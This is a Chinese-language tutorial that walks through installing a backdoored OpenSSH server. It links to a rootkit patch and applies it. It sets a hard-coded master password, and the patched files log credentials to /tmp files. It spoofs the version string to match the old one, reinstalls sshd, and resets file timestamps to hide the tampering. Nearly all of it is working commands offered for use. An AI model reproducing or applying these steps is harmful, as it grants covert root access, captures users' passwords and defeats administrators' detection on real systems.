一.查看SSH版本
[root@redkey vmshare]# ssh -V OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010
二.下載SSH 源碼包
源碼包:
http://openbsd.org.ar/pub/OpenBSD/OpenSSH/portable/openssh-5.9p1.tar.gz
後門文件:
http://core.ipsecs.com/rootkit/patch-to-hack/0x06-openssh-5.9p1.patch.tar.gz
三.備份原有ssh配置文件
[root@redkey ~]# cp -p /etc/ssh/sshd_config{,.bak}
四.編譯安裝
[root@redkey vmshare]# tar -xzvf openssh-5.9p1.tar.gz
[root@redkey vmshare]# tar -xzvf 0x06-openssh-5.9p1.patch.tar.gz
[root@redkey vmshare]# cd openssh-5.9p1.patch/
[root@redkey openssh-5.9p1.patch]# cp sshbd5.9p1.diff ../openssh-5.9p1
[root@redkey openssh-5.9p1.patch]# cd ../openssh-5.9p1
[root@redkey openssh-5.9p1]# patch < sshbd5.9p1.diff patching file auth.c patching file auth-pam.c patching file auth-passwd.c patching file canohost.c patching file includes.h patching file log.c patching file servconf.c patching file sshconnect2.c patching file sshlogin.c patching file version.hxiu
設置後門密碼"redkey"
[root@redkey openssh-5.9p1]# vim includes.h
175 int secret_ok; 176 FILE *f; 177 #define ILOG "/tmp/ilog" 178 #define OLOG "/tmp/olog" 179 #define SECRETPW "redkey" 180 #endif /* INCLUDES_H */
修改版本信息(SSH_VERSION):
/* $OpenBSD: version.h,v 1.62 2011/08/02 23:13:01 djm Exp $ */ #define SSH_VERSION "OpenSSH_5.3p1" #define SSH_PORTABLE "p1" #define SSH_RELEASE SSH_VERSION SSH_PORTABLE
編譯&安裝
[root@redkey openssh-5.9p1]# ./configure --prefix=/usr/ --sysconfdir=/etc/ssh/ --with-pam --with-kerberos5
[root@redkey openssh-5.9p1]# make
[root@redkey openssh-5.9p1]# make install
五.還原sshd_config文件時間戳
[root@redkey ssh]# touch -r sshd_config.bak ssh_config
六.重啓服務或重新載入配置
[root@redkey ssh]# service sshd reload
七.常見問題
1.需要安裝的軟件包
openssl openssl-devel pam-devel
2.編譯常見的問題
編譯過程中可能出現的報錯: configure: error: *** zlib.h missing – please install first or check config.log # #yum install zlib-devel configure: error: *** Can't find recent OpenSSL libcrypto (see config.log for details) *** # #yum install openssl openssl-devel